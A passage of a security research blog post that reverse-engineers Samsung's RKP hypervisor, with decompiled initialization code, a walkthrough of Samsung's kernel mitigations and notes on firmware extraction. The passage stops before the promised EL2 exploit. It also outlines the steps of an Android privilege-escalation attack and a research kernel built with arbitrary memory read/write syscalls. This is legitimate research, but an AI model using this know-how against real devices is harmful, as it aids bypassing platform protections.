This first goal of this blog post is to serve as a comprehensive reference of Samsung RKP's inner workings. It enables anyone to start poking at this obscure code that is executing at a high privilege level on their device. Our explanations are often accompanied by snippets of decompiled code that you can feel free to skip over.
The second goal, and maybe of interest to more people, is to reveal a now-fixed vulnerability that allows getting code execution at EL2 in Samsung RKP. It is a good example of a simple mistake that compromises platform security as the exploit consists of a single call that allows getting hypervisor memory writable at EL1.
In the first part, we will talk briefly about Samsung's kernel mitigations (that would probably deserve a blog post of their own). In the second part, we will explain how to get your hand on the RKP binary for your device.
In the third part, we will start taking apart the hypervisor framework that supports RKP on the Exynos devices, before digging into the internals of RKP in the fourth part. We will detail how it is started, how it processes the kernel pages tables, how it protects sensitive data structures, and finally how it enables the kernel mitigations.
In the fifth and last part, we will reveal the vulnerability, the one-liner exploit and take a look at the patch.
In the mobile device world, security traditionally relied on kernel mechanisms. But history has shown us that the kernel was far from being unbreakable. For most Android devices, finding a kernel vulnerability allows an attacker to modify sensitive kernel data structures, elevate privileges and execute malicious code.
It is also simply not enough to ensure kernel integrity at boot time (using the Verified Boot mechanism). Kernel integrity must also be verified at run time. This is what a security hypervisor aims to do. RKP, or "Real-time Kernel Protection", is the name of Samsung's hypervisor implementation which is part of Samsung KNOX.
There is already a lot of great research that has been done on Samsung RKP, specifically Gal Beniamini's Lifting the (Hyper) Visor: Bypassing Samsung’s Real-Time Kernel Protection and Aris Thallas's On emulating hypervisors: a Samsung RKP case study which we both highly recommend that you read before this blog post.
A typical local privilege escalation (LPE) flow on Android involves:
address_limit
to -1;selinux_(enable|enforcing)
;uid
, gid
, sid
, capabilities, etc.Samsung has implemented mitigations to try and make that task as hard as possible for an attacker: JOPP, ROPP and KDP are three of them. Not all Samsung devices have the same mitigations in place though.
Here is what we observed after downloading various firmware updates:
Device | Region | JOPP | ROPP | KDP |
---|---|---|---|---|
Low-end | International | No | No | Yes |
Low-end | United States | No | No | Yes |
High-end | International | Yes | No | Yes |
High-end | United States | Yes | Yes | Yes |
Jump-Oriented Programming Prevention (JOPP) aims to prevent JOP. It is a homemade CFI solution. It first uses a modified compiler toolchain to place a NOP instruction before each function start. It then uses a Python script (Kernel/scripts/rkp_cfp/instrument.py
) to process the compiled kernel binary and replace NOPs with a magic value (0xbe7bad) and indirect branches with a direct branch to a helper function.
The helper function jopp_springboard_blr_rX
(in Kernel/init/rkp_cfp.S
) will check if the value before the target matches the magic value and take the jump if it does, or crash if it doesn't:
.macro springboard_blr, reg
jopp_springboard_blr_\reg:
push RRX, xzr
ldr RRX_32, [\reg, #-4]
subs RRX_32, RRX_32, #0xbe7, lsl #12
cmp RRX_32, #0xbad
b.eq 1f
...
inst 0xdeadc0de //crash for sure
...
1:
pop RRX, xzr
br \reg
.endm
Return-Oriented Programming Prevention (ROPP) aims to prevent ROP. It is a homemade "stack canary". It uses the same modified compiler toolchain to emit NOP instructions before stp x29, x30
instructions and after ldp x29, x30
instructions, and to prevent allocation of registers X16 and X17. It then uses the same Python script to replace the prologues and epilogues of assembled C functions like so:
nop
stp x29, x30, [sp,#-<frame>]!
(insns)
ldp x29, x30, ...
nop
is replaced with
eor RRX, x30, RRK
stp x29, RRX, [sp,#-<frame>]!
(insns)
ldp x29, RRX, ...
eor x30, RRX, RRK
where RRX
is an alias for X16 and RRK
for X17.
RRK is called the "thread key" and is unique to each kernel task. So instead of pushing directly the return address on the stack, they are XORing it first with this key, preventing an attacker from changing the return address without knowledge of the thread key.
The thread key itself is stored in the rrk
field of the thread_info
structure, but XORed with the RRMK.
struct thread_info {
// ...
unsigned long rrk;
};
RRMK is called the "master key". On production devices, it is stored in the DBGBCR5_EL1
(Debug Breakpoint Value Register 5) system register. It is set by the hypervisor during kernel initialization as we will see later.
Kernel Data Protection (KDP) is another hypervisor-enabled mitigation. It is a homemade Data Flow Integrity (DFI) solution. Its makes sensitive kernel data structures (like the page tables, struct cred
, struct task_security_struct
, struct vfsmount
, SELinux status, etc.) read-only thanks to the hypervisor.
For understanding Samsung RKP, you will need some basic knowledge about the virtualization extensions on ARMv8 platforms. We recommend that you read the section "HYP 101" of Lifting the (Hyper) Visor or the section "ARM Architecture & Virtualization Extensions" of On emulating hypervisors.
To paraphrase these chapters, a hypervisor is executing at a higher privilege level than the kernel, so that gives it complete control over it. Here is the architecture looks like on ARMv8 platforms:
The hypervisor can receive calls from the kernel via the HyperVisor Call (HVC) instruction. Moreover, by using the Hypervisor Configuration Register (HCR), the hypervisor can trap critical operations usually handled by the kernel (access to virtual memory control registers, etc.) and also handle general exceptions.
Finally, the hypervisor is taking advantage of a second layer of address translation, called "stage 2 translation". In the standard "stage 1 translation", a Virtual Address (VA) is translated into Intermediate Physical Address (IPA). Then this IPA is translated into the final final Physical Address (PA) by the second stage.
Here is what the address translation looks like with 2-stage address translation enabled:
The hypervisor still only has a single stage address translation for its own memory accesses.
To make it easier to get started with this research, we have been using a bootloader unlocked Samsung A51 (SM-A515F) instead of a full exploit chain. We have downloaded the kernel source code for our device on the Samsung Open Source website, modified them and recompiled them (that did not work out of the box).
For this research, we have implemented new syscalls:
- kernel memory allocation/freeing;
- arbitrary read/write of kernel memory;
- hypervisor call (using the uh_call
function).
These syscalls makes it really convenient to interact with RKP as you will see in the exploitation section: we just need to write a piece of C code (or Python) that will execute in userland and perform whatever we want.
RKP is implemented for both Exynos and Snapdragon-equipped devices, and both implementations share a lot of code. However, most if not all of the existing research has been done on the Exynos variant, as it is the most straightforward to dig into: RKP is available as a standalone binary. On Snapdragon devices, it is embedded inside the Qualcomm Hypervisor Execution Environment (QHEE) image which is very large and complicated.
On Exynos devices, RKP used to be embedded directly into the kernel binary and so it could be found as the vmm.elf
file in the kernel source archives. Around late 2017/early 2018, VMM was rewritten into a new framework called uH, which most likely stands for "micro-hypervisor". Consequently, the binary has been renamed to uh.elf
and can still be found in the kernel source archives for a few devices.
Because of Gal Beniamini's first suggested design improvements, on most devices RKP has been moved out of the kernel binary and into a partition of its own called uh
. That makes it even easier to extract, for example by grabbing it from the BL_xxx.tar
archive contained in a firmware update (it is usually LZ4-compressed and starts with a 0x1000 bytes header that needs to be stripped to get to the real ELF file).
The architecture has changed slightly on the S20 and later devices, as Samsung has introduced another framework to support RKP (called H-Arx
), most likely to unify even more the code base with the Snapdragon devices, and it also features more uH "apps". However, we won't be taking a look at it in this blog post.
On Snapdragon devices, RKP can be found in the hyp
partition, and can also be extracted from the BL_xxx.tar
archive in a firmware update. It is one of the segments that make up the QHEE image.
The main difference with Exynos devices is that it is QHEE that sets the page tables and the exception vector. As a result, it is QHEE that notifies uH when exceptions happen (HVC or trapped system register), and uH has to make a call to QHEE when it wants to modify the page tables. The rest of the code is almost identical.
Back in 2017, the RKP binary was shipped with symbols and log strings. But that isn't the case anymore. Nowadays the binaries are stripped, and the log strings are replaced with placeholders (like Qualcomm does). Nevertheless, we tried getting our hands on as many binaries as possible, hoping that Samsung did not do that for all of their devices, as it is sometimes the case with other OEMs.
By mass downloading firmware updates for various Exynos devices, we gathered around ~300 unique hypervisor binaries. None of the uh.elf
files had symbols, so we had to manually port them over from the old vmm.elf
files. Some of the uh.elf
files had the full log strings, the latest one being from Apr 9 2019.
With the full log strings and their hashed version, we could figure out that the hash value is the simply the truncation of SHA256's output. Here is a Python one-liner to calculate the hash in case you need it:
hashlib.sha256(log_string).hexdigest()[:8]
The uH framework acts as a micro-OS, of which RKP is an application. This is really more of a way to organize things as "apps" are simply a bunch of commands handlers and don't have any kind of isolation.
Before digging into the code, we will briefly tell you about the utility structures that are used extensively by uH and the RKP app. We won't be detailing their implementation, but it is important to understand what they do.
The memlist_t
structure is defined like so (names are our own):
typedef struct memlist {
memlist_entry_t *base;
uint32_t capacity;
uint32_t count;
uint32_t merged;
crit_sec_t cs;
} memlist_t;
It is a list of address ranges, a sort of specialized version of a C++ vector (it has a capacity and a size).
The memlist entries are defined like so:
typedef struct memlist_entry {
uint64_t addr;
uint64_t size;
uint64_t field_10;
uint64_t extra;
} memlist_entry_t;
There are utility functions to add and remove ranges from a memlist, to check if an address is contained in a memlist, or if a range overlaps with a memlist, etc.
The sparsemap_t
structure is defined like so (names are our own):
typedef struct sparsemap {
char name[8];
uint64_t start_addr;
uint64_t end_addr;
uint64_t count;
uint64_t bit_per_page;
uint64_t mask;
crit_sec_t cs;
memlist_t *list;
sparsemap_entry_t *entries;
uint32_t private;
uint32_t field_54;
} sparsemap_t;
The sparsemap is a map that associates values to addresses. It is created from a memlist and will map all the addresses in this memlist to a value. The size of this value is determined by the bit_per_page
field.
The sparsemap entries are defined like so:
typedef struct sparsemap_entry {
uint64_t addr;
uint64_t size;
uint64_t bitmap_size;
uint8_t* bitmap;
} sparsemap_entry_t;
There are functions to get and set the value for each entry of the map, etc.
The crit_sec_t
structure is used to implement critical sections (names are our own):
typedef struct crit_sec {
uint32_t cpu;
uint32_t lock;
uint64_t lr;
} crit_sec_t;
And of course, there are functions to enter and exit the critical sections.
uH/RKP is loaded into memory by S-Boot (Samsung Bootloader). S-Boot jumps to the EL2 entry-point by asking the secure monitor (running at EL3) to start executing hypervisor code at the address it specifies.
uint64_t cmd_load_hypervisor() {
// ...
part = FindPartitionByName("UH");
if (part) {
dprintf("%s: loading uH image from %d..\n", "f_load_hypervisor", part->block_offset);
ReadPartition(&hdr, part->file_offset, part->block_offset, 0x4C);
dprintf("[uH] uh page size = 0x%x\n", (((hdr.size - 1) >> 12) + 1) << 12);
total_size = hdr.size + 0x1210;
dprintf("[uH] uh total load size = 0x%x\n", total_size);
if (total_size > 0x200000 || hdr.size > 0x1FEDF0) {
dprintf("Could not do normal boot.(invalid uH length)\n");
// ...
}
ret = memcmp_s(&hdr, "GREENTEA", 8);
if (ret) {
ret = -1;
dprintf("Could not do uh load. (invalid magic)\n");
// ...
} else {
ReadPartition(0x86FFF000, part->file_offset, part->block_offset, total_size);
ret = pit_check_signature(part->partition_name, 0x86FFF000, total_size);
if (ret) {
dprintf("Could not do uh load. (invalid signing) %x\n", ret);
// ...
}
load_hypervisor(0xC2000400, 0x87001000, 0x2000, 1, 0x87000000, 0x100000);
dprintf("[uH] load hypervisor\n");
}
} else {
ret = -1;
dprintf("Could not load uH. (invalid ppi)\n");
// ...
}
return ret;
}
void load_hypervisor(...) {
dsb();
asm("smc #0");
isb();
}
Note: On recent Samsung devices, the monitor code (based on ATF - ARM Trusted Firmware) is not longer in plain-text in the S-Boot binary. In its place can be found an encrypted blob. A vulnerability in Samsung's Trusted OS implementation (TEEGRIS) we will need to be found so that plain-text monitor code can be dumped.
void default(...) {
// ...
if (get_current_el() == 8) {
// Save registers x0 to x30, sp_el1, elr_el2, spsr_el2
// ...
memset(&rkp_bss_start, 0, 0x1000);
main(saved_regs.x0, saved_regs.x1, &saved_regs);
}
asm("smc #0");
}
Execution starts in the default
function. This function checks if it is running at EL2 before calling main
. Once main
returns, it makes an SMC, presumably to give the control back to S-Boot.
int32_t main(int64_t x0, int64_t x1, saved_regs_t* regs) {
// ...
// Setting A=0 (Alignment fault checking disabled)
// SA=0 (SP Alignment check disabled)
set_sctlr_el2(get_sctlr_el2() & 0xFFFFFFF5);
if (!initialized) {
initialized = 1;
// Check if loading address is as expected
if (&hyp_base != 0x87000000) {
uh_log('L', "slsi_main.c", 326, "[-] static s1 mmu mismatch");
return -1;
}
set_ttbr0_el2(&static_s1_page_tables_start__);
s1_enable();
uh_init(0x87000000, 0x200000);
if (vmm_init())
return -1;
uh_log('L', "slsi_main.c", 338, "[+] vmm initialized");
set_vttbr_el2(&static_s2_page_tables_start__);
uh_log('L', "slsi_main.c", 348, "[+] static s2 mmu initialized");
s2_enable();
uh_log('L', "slsi_main.c", 351, "[+] static s2 mmu enabled");
}
uh_log('L', "slsi_main.c", 355, "[*] initialization completed");
return 0;
}
After disabling the alignment checks and making sure the binary is loaded at the expected address (0x87000000 for this binary), main
sets TTBR0_EL2
to its initial page tables and calls s1_enable
.
void s1_enable() {
// ...
cs_init(&s1_lock);
// Setting Attr0=0xff (Normal memory, Outer & Inner Write-Back Non-transient,
// Outer & Inner Read-Allocate Write-Allocate)
// Attr1=0x00 (Device-nGnRnE memory)
// Attr2=0x44 (Normal memory, Outer & Inner Write-Back Transient,
// Outer & Inner No Read-Allocate No Write-Allocate)
set_mair_el2(get_mair_el2() & 0xFFFFFFFFFF000000 | 0x4400FF);
// Setting T0SZ=24 (TTBR0_EL2 region size is 2^40)
// IRGN0=0b11 && ORGN0=0b11
// (Normal memory, Outer & Inner Write-Back
// Read-Allocate No Write-Allocate Cacheable)
// SH0=0b11 (Inner Shareable)
// PAS=0b010 (PA size is 40 bits, 1TB)
set_tcr_el2(get_tcr_el2(); &0xFFF8C0C0 | 0x23F18);
flush_entire_cache();
sctlr_el2 = get_sctlr_el2();
// Setting C=1 (data is cacheable for EL2)
// I=1 (instruction access is cacheable for EL2)
// WXN=1 (writeable implies non-executable for EL2)
set_sctlr_el2(sctlr_el2 & 0xFFF7EFFB | 0x81004);
invalidate_entire_s1_el2_tlb();
// Setting M=1 (EL2 stage 1 address translation enabled)
set_sctlr_el2(sctlr_el2 & 0xFFF7EFFA | 0x81005);
}
s1_enable
sets mostly cache-related fields of MAIR_EL2
, TCR_EL2
and SCTLR_EL2
, and most importantly enables the MMU for the EL2. main
then calls the uh_init
function and passes it the uH memory range.
We can already see that Gal Beniamini's second suggested design improvement, setting the WXN bit to 1, has also been implemented by the Samsung KNOX team.
int64_t uh_init(int64_t uh_base, int64_t uh_size) {
// ...
memset(&uh_state.base, 0, sizeof(uh_state));
uh_state.base = uh_base;
uh_state.size = uh_size;
static_heap_initialize(uh_base, uh_size);
if (!static_heap_remove_range(0x87100000, 0x40000) || !static_heap_remove_range(&hyp_base, 0x87046000 - &hyp_base) ||
!static_heap_remove_range(0x870FF000, 0x1000)) {
uh_panic();
}
memory_init();
uh_log('L', "main.c", 131, "================================= LOG FORMAT =================================");
uh_log('L', "main.c", 132, "[LOG:L, WARN: W, ERR: E, DIE:D][Core Num: Log Line Num][File Name:Code Line]");
uh_log('L', "main.c", 133, "==============================================================================");
uh_log('L', "main.c", 134, "[+] uH base: 0x%p, size: 0x%lx", uh_state.base, uh_state.size);
uh_log('L', "main.c", 135, "[+] log base: 0x%p, size: 0x%x", 0x87100000, 0x40000);
uh_log('L', "main.c", 137, "[+] code base: 0x%p, size: 0x%p", &hyp_base, 0x46000);
uh_log('L', "main.c", 139, "[+] stack base: 0x%p, size: 0x%p", stacks, 0x10000);
uh_log('L', "main.c", 143, "[+] bigdata base: 0x%p, size: 0x%p", 0x870FFC40, 0x3C0);
uh_log('L', "main.c", 152, "[+] date: %s, time: %s", "Feb 27 2020", "17:28:58");
uh_log('L', "main.c", 153, "[+] version: %s", "UH64_3b7c7d4f exynos9610");
uh_register_commands(0, init_cmds, 0, 5, 1);
j_rkp_register_commands();
uh_log('L', "main.c", 370, "%d app started", 1);
system_init();
apps_init();
uh_init_bigdata();
uh_init_context();
memlist_init(&uh_state.dynamic_regions);
pa_restrict_init();
uh_state.inited = 1;
uh_log('L', "main.c", 427, "[+] uH initialized");
return 0;
After saving the arguments into a global control structure we named uh_state
, uh_init
calls static_heap_initialize
. This function saves its arguments into global variables, and also initialize the doubly linked list of heap chunks with a single free chunk spanning over the whole uH static memory range.
uh_init
then calls heap_remove_range
to remove 3 important ranges from the memory that can be returned by the static heap allocator (effectively splitting the original chunk into multiples ones):
uh_init
then calls memory_init
.
int64_t memory_init() {
memory_buffer = 0x87100000;
memset(0x87100000, 0, 0x40000);
cs_init(&memory_cs);
clean_invalidate_data_cache_region(0x87100000, 0x40000);
memory_buffer_index = 0;
memory_active = 1;
return s1_map(0x87100000, 0x40000, UNKN3 | WRITE | READ);
}
This function zeroes out the log region and maps it into the EL2 page tables. This region will be used by the *printf
string printing functions which are called inside of the uh_log
function.
uh_init
then logs various informations using uh_log
(these messages can be retrieved from /proc/uh_log
on the device). uh_init
then calls uh_register_commands
and rkp_register_commands
(which also calls uh_register_commands
but with a different set of arguments).
int64_t uh_register_commands(uint32_t app_id,
int64_t cmd_array,
int64_t cmd_checker,
uint32_t cmd_count,
uint32_t flag) {
// ...
if (uh_state.inited)
uh_log('D', "event.c", 11, "uh_register_event is not permitted after uh_init : %d", app_id);
if (app_id >= 8)
uh_log('D', "event.c", 14, "wrong app_id %d", app_id);
uh_state.cmd_evtable[app_id] = cmd_array;
uh_state.cmd_checkers[app_id] = cmd_checker;
uh_state.cmd_counts[app_id] = cmd_count;
uh_state.cmd_flags[app_ip] = flag;
uh_log('L', "event.c", 21, "app_id:%d, %d events and flag(%d) has registered", app_id, cmd_count, flag);
if (cmd_checker)
uh_log('L', "event.c", 24, "app_id:%d, cmd checker enforced", app_id);
return 0;
}
uh_register_commands
takes as arguments the application ID, an array of command handlers, an optional command "checker" function, the number of commands in the array, and a debug flag. These values will be stored in the fields cmd_evtable
, cmd_checkers
, cmd_counts
and cmd_flags
of the uh_state
structure.
According to the kernel sources, there are only 3 applications defined, even though uH supports up to 8.
// from include/linux/uh.h
#define APP_INIT 0
#define APP_SAMPLE 1
#define APP_RKP 2
#define UH_PREFIX UL(0xc300c000)
#define UH_APPID(APP_ID) ((UL(APP_ID) & UL(0xFF)) | UH_PREFIX)
enum __UH_APP_ID {
UH_APP_INIT = UH_APPID(APP_INIT),
UH_APP_SAMPLE = UH_APPID(APP_SAMPLE),
UH_APP_RKP = UH_APPID(APP_RKP),
};
uh_init
then calls system_init
and apps_init
.
uint64_t system_init() {
// ...
memset(&saved_regs, 0, sizeof(saved_regs));
res = uh_handle_command(0, 0, &saved_regs);
if (res)
uh_log('D', "main.c", 380, "system init failed %d", res);
return res;
}
uint64_t apps_init() {
// ...
memset(&saved_regs, 0, sizeof(saved_regs));
for (i = 1; i != 8; ++i) {
if (uh_state.cmd_evtable[i]) {
uh_log('W', "main.c", 393, "[+] dst %d initialized", i);
res = uh_handle_command(i, 0, &saved_regs);
if (res)
uh_log('D', "main.c", 396, "app init failed %d", res);
}
}
return res;
}
These functions call the command #0, system_init
of APP_INIT
, and apps_init
of all the other registered applications. In our case, it will end up calling init_cmd_init
and rkp_cmd_init
as we will see later.
int64_t uh_handle_command(uint64_t app_id, uint64_t cmd_id, saved_regs_t* regs) {
// ...
if ((uh_state.cmd_flags[app_id] & 1) != 0)
uh_log('L', "main.c", 441, "event received %lx %lx %lx %lx %lx %lx", app_id, cmd_id, regs->x2, regs->x3, regs->x4,
regs->x5);
cmd_checker = uh_state.cmd_checkers[app_id];
if (cmd_id && cmd_checker && cmd_checker(cmd_id)) {
uh_log('E', "main.c", 448, "cmd check failed %d %d", app_id, cmd_id);
return -1;
}
if (app_id >= 8)
uh_log('D', "main.c", 453, "wrong dst %d", app_id);
if (!uh_state.cmd_evtable[app_id])
uh_log('D', "main.c", 456, "dst %d evtable is NULL\n", app_id);
if (cmd_id >= uh_state.cmd_counts[app_id])
uh_log('D', "main.c", 459, "wrong type %lx %lx", app_id, cmd_id);
cmd_handler = uh_state.cmd_evtable[app_id][cmd_id];
if (!cmd_handler) {
uh_log('D', "main.c", 464, "no handler %lx %lx", app_id, cmd_id);
return -1;
}
return cmd_handler(regs);
}
uh_handle_command
prints the app ID, command ID and its arguments if the debug flag was set, calls the command checker function if specified, then calls the appropriate command handler.
uh_init
then calls uh_init_bigdata
and uh_init_context
.
int64_t uh_init_bigdata() {
if (!bigdata_state)
bigdata_state = malloc(0x230, 0);
memset(0x870FFC40, 0, 960);
memset(bigdata_state, 0, 560);
return s1_map(0x870FF000, 0x1000, UNKN3 | WRITE | READ);
}
uh_init_bigdata
allocates and zeroes out the buffers used by the analytics feature. It also makes the bigdata region accessible as read and write in the EL2 page tables.
int64_t* uh_init_context() {
// ...
uh_context = malloc(0x1000, 0);
if (!uh_context)
uh_log('W', "RKP_1cae4f3b", 21, "%s RKP_148c665c", "uh_init_context");
return memset(uh_context, 0, 0x1000);
}
uh_init_context
allocates and zeroes out a buffer that is used to store the hypervisor registers on platform resets (we don't know where it is used, maybe by the monitor to restore the hypervisor state on some event).
uh_init
calls memlist_init
to initialize the dynamic_regions
memlist in the uh_state
structure, and then calls the pa_restrict_init
function.
int64_t pa_restrict_init() {
memlist_init(&protected_ranges);
memlist_add(&protected_ranges, 0x87000000, 0x200000);
if (!memlist_contains_addr(&protected_ranges, rkp_cmd_counts))
uh_log('D', "pa_restrict.c", 79, "Error, cmd_cnt not within protected range, cmd_cnt addr : %lx", rkp_cmd_counts);
if (!memlist_contains_addr(&protected_ranges, (uint64_t)&protected_ranges))
uh_log('D', "pa_restrict.c", 84, "Error protect_ranges not within protected range, protect_ranges addr : %lx",
&protected_ranges);
return uh_log('L', "pa_restrict.c", 87, "[+] uH PA Restrict Init");
}
pa_restrict_init
initializes the protected_ranges
memlist, and adds the uH memory region to it. It also checks that rkp_cmd_counts
and the protected_ranges
structures are contained in the memlist.
uh_init
returns to main
, which then calls vmm_init
.
int64_t vmm_init() {
// ...
uh_log('L', "vmm.c", 142, ">>vmm_init<<");
cs_init(&stru_870355E8);
cs_init(&panic_cs);
set_vbar_el2(&vmm_vector_table);
// Setting TVM=1 (EL1 write accesses to the specified EL1 virtual
// memory control registers are trapped to EL2)
hcr_el2 = get_hcr_el2() | 0x4000000;
uh_log('L', "vmm.c", 161, "RKP_398bc59b %x", hcr_el2);
set_hcr_el2(hcr_el2);
return 0;
}
vmm_init
sets the VBAR_EL2
register to the exception vector used by the hypervisor and enable trapping of writes to the virtual memory control registers at EL1.
uh_init
then sets the VTTBR_EL2
register to the initial pages tables that will be used for the second stage address translation for memory access at EL1. Finally, before returning it calls s2_enable
.
void s2_enable() {
// ...
cs_init(&s2_lock);
// Setting T0SZ=24 (VTTBR_EL2 region size is 2^40)
// SL0=0b01 (Stage 2 translation lookup start at level 1)
// IRGN0=0b11 && ORGN0=0b11
// (Normal memory, Outer & Inner Write-Back
// Read-Allocate No Write-Allocate Cacheable)
// SH0=0b11 (Inner Shareable)
// TG0=0b00 (Granule size is 4KB)
// PS=0b010 (PA size is 40 bits, 1TB)
set_vtcr_el2(get_vtcr_el2() & 0xFFF80000 | 0x23F58);
invalidate_entire_s1_s2_el1_tlb();
// Setting VM=1
set_hcr_el2(get_hcr_el2() | 1);
lock_start = 1;
}
s2_enable
configures the second stage address translation registers and enables it.
We mentioned that uh_init
calls the command #0 for each of the registered applications. Let's see what is being executed for the two applications APP_INIT
(some kind of init
process equivalent) and APP_RKP
.
APP_INIT
The command handlers registered for APP_INIT
are:
Command ID | Command Handler | Maximum Calls |
---|---|---|
0x00 | init_cmd_init |
- |
0x02 | init_cmd_add_dynamic_region |
- |
0x03 | init_cmd_id_0x03 |
- |
0x04 | init_cmd_initialize_dynamic_heap |
- |
Let's take a look at command #0 called during startup by uH.
int64_t init_cmd_init(saved_regs_t* regs) {
// ...
if (!uh_state.fault_handler && regs->x2) {
uh_state.fault_handler = rkp_get_pa(regs->x2);
uh_log('L', "main.c", 161, "[*] uH fault handler has been registered");
}
return 0;
}
The command #0 handler of APP_INIT
is really simple: it sets the fault_handler
field of uh_state
. This structure contains the address of a kernel function that will be called when a fault is detected by the hypervisor.
When uH calls this command, it won't do anything as the registers are all set to 0. But this command will also be called later by the kernel, as can been seen in the rkp_init
function from init/main.c
.
// from init/main.c
static void __init rkp_init(void)
{
uh_call(UH_APP_INIT, 0, uh_get_fault_handler(), kimage_voffset, 0, 0);
// ...
}
// from include/linux/uh_fault_handler.h
typedef struct uh_registers {
u64 regs[31];
u64 sp;
u64 pc;
u64 pstate;
} uh_registers_t;
typedef struct uh_handler_data{
esr_t esr_el2;
u64 elr_el2;
u64 hcr_el2;
u64 far_el2;
u64 hpfar_el2;
uh_registers_t regs;
} uh_handler_data_t;
typedef struct uh_handler_list{
u64 uh_handler;
uh_handler_data_t uh_handler_data[NR_CPUS];
} uh_handler_list_t;
// from init/uh_fault_handler.c
void uh_fault_handler(void)
{
unsigned int cpu;
uh_handler_data_t *uh_handler_data;
u32 exception_class;
unsigned long flags;
struct pt_regs regs;
spin_lock_irqsave(&uh_fault_lock, flags);
cpu = smp_processor_id();
uh_handler_data = &uh_handler_list.uh_handler_data[cpu];
exception_class = uh_handler_data->esr_el2.ec;
if (!exception_class_string[exception_class]
|| exception_class > esr_ec_brk_instruction_execution)
exception_class = esr_ec_unknown_reason;
pr_alert("=============uH fault handler logging=============\n");
pr_alert("%s",exception_class_string[exception_class]);
pr_alert("[System registers]\n", cpu);
pr_alert("ESR_EL2: %x\tHCR_EL2: %llx\tHPFAR_EL2: %llx\n",
uh_handler_data->esr_el2.bits,
uh_handler_data->hcr_el2, uh_handler_data->hpfar_el2);
pr_alert("FAR_EL2: %llx\tELR_EL2: %llx\n", uh_handler_data->far_el2,
uh_handler_data->elr_el2);
memset(®s, 0, sizeof(regs));
memcpy(®s, &uh_handler_data->regs, sizeof(uh_handler_data->regs));
do_mem_abort(uh_handler_data->far_el2, (u32)uh_handler_data->esr_el2.bits, ®s);
panic("%s",exception_class_string[exception_class]);
}
u64 uh_get_fault_handler(void)
{
uh_handler_list.uh_handler = (u64) & uh_fault_handler;
return (u64) & uh_handler_list;
}
They are 2 commands of APP_INIT
that are used for initialization-related things (even though they don't have command ID #0). They are not called by the kernel, but by S-Boot before loading/executing the kernel.
int64_t dtb_update(...) {
// ...
dtb_find_entries(dtb, "memory", j_uh_add_dynamic_region);
sprintf(path, "/reserved-memory");
offset = dtb_get_path_offset(dtb, path);
if (offset < 0) {
dprintf("%s: fail to get path [%s]: %d\n", "dtb_update_reserved_memory", path, offset);
} else {
heap_base = 0;
heap_size = 0;
dtb_add_reserved_memory(dtb, offset, 0x87000000, 0x200000, "el2_code", "el2,uh");
uh_call(0xC300C000, 4, &heap_base, &heap_size, 0, 0);
dtb_add_reserved_memory(dtb, offset, heap_base, heap_size, "el2_earlymem", "el2,uh");
dtb_add_reserved_memory(dtb, offset, 0x80001000, 0x1000, "kaslr", "kernel-kaslr");
if (get_env_var(FORCE_UPLOAD) == 5)
rmem_size = 0x2400000;
else
rmem_size = 0x1700000;
dtb_add_reserved_memory(dtb, offset, 0xC9000000, rmem_size, "sboot", "sboot,rmem");
}
// ...
}
int64_t uh_add_dynamic_region(int64_t addr, int64_t size) {
uh_call(0xC300C000, 2, addr, size, 0, 0);
return 0;
}
void uh_call(...) {
asm("hvc #0");
}
S-Boot will call command #2 for each memory
node in the DTB (the HVC arguments are the memory region address and size). It will then call command #4 (the arguments are two pointers to local variables of S-Boot).
int64_t init_cmd_add_dynamic_region(saved_regs_t* regs) {
// ...
if (uh_state.dynamic_heap_inited || !regs->x2 || !regs->x3)
return -1;
return memlist_add(&uh_state.dynamic_regions, regs->x2, regs->x3);
}
The command #2, that we named add_dynamic_region
, is used to add a memory range to the dynamic_regions
memlist, out of which will be carved the "dynamic heap" region of uH. S-Boot indicates to the hypervisor which physical memory regions it can access once DDR has been initialized.
int64_t init_cmd_initialize_dynamic_heap(saved_regs_t* regs) {
// ...
if (!regs->x2 || !regs->x3)
return -1;
PHYS_OFFSET = memlist_get_min_addr(&uh_state.dynamic_regions);
base = virt_to_phys_el1(regs->x2);
check_kernel_input(base);
size = virt_to_phys_el1(regs->x3);
check_kernel_input(size);
if (!base || !size) {
uh_log('L', "main.c", 188, "Wrong addr in dynamicheap : base: %p, size: %p", base, size);
return -1;
}
if (uh_state.dynamic_heap_inited)
return -1;
uh_state.dynamic_heap_inited = 1;
dynamic_heap_base = *base;
if (!regs->x4) {
memlist_merge_ranges(&uh_state.dynamic_regions);
memlist_dump(&uh_state.dynamic_regions);
some_size1 = memlist_get_some_size(&uh_state.dynamic_regions, 0x100000);
set_robuf_size(some_size1 + 0x600000);
some_size2 = memlist_get_some_size(&uh_state.dynamic_regions, 0x100000);
some_size3 = memlist_get_some_size(&uh_state.dynamic_regions, 0x200000);
dynamic_heap_size = (some_size1 + some_size2 + some_size3 + 0x7FFFFF) & 0xFFE00000;
} else {
dynamic_heap_size = *size;
}
if (!dynamic_heap_base) {
dynamic_heap_base = memlist_get_region_of_size(&uh_state.dynamic_regions, dynamic_heap_size, 0x200000);
} else {
if (memlist_remove(&uh_state.dynamic_regions, dynamic_heap_base, dynamic_heap_size)) {
uh_log('L', "main.c", 281, "[-] Dynamic heap address is not existed in memlist, base : %p", dynamic_heap_base);
return -1;
}
}
dynamic_heap_initialize(dynamic_heap_base, dynamic_heap_size);
uh_log('L', "main.c", 288, "[+] Dynamic heap initialized base: %lx, size: %lx", dynamic_heap_base, dynamic_heap_size);
*base = dynamic_heap_base;
*size = dynamic_heap_size;
mapped_start = dynamic_heap_base;
if ((s2_map(dynamic_heap_base, dynamic_heap_size_0, UNKN1 | WRITE | READ, &mapped_start) & 0x8000000000000000) != 0) {
uh_log('L', "main.c", 299, "s2_map returned false, start : %p, size : %p", mapped_start, dynamic_heap_size);
return -1;
}
sparsemap_init("physmap", &uh_state.phys_map, &uh_state.dynamic_regions, 0x20, 0);
sparsemap_for_all_entries(&uh_state.phys_map, protected_ranges_add);
sparsemap_init("ro_bitmap", &uh_state.ro_bitmap, &uh_state.dynamic_regions, 1, 0);
sparsemap_init("dbl_bitmap", &uh_state.dbl_bitmap, &uh_state.dynamic_regions, 1, 0);
memlist_init(&uh_state.page_allocator.list);
memlist_add(&uh_state.page_allocator.list, dynamic_heap_base, dynamic_heap_size);
sparsemap_init("robuf", &uh_state.page_allocator.map, &uh_state.page_allocator.list, 1, 0);
allocate_robuf();
regions_end_addr = memlist_get_max_addr(&uh_state.dynamic_regions);
if ((regions_end_addr >> 33) <= 4) {
s2_unmap(regions_end_addr, 0xA00000000 - regions_end_addr);
s1_unmap(regions_end_addr, 0xA00000000 - regions_end_addr);
}
return 0;
}
The command #4, that we named initialize_dynamic_heap
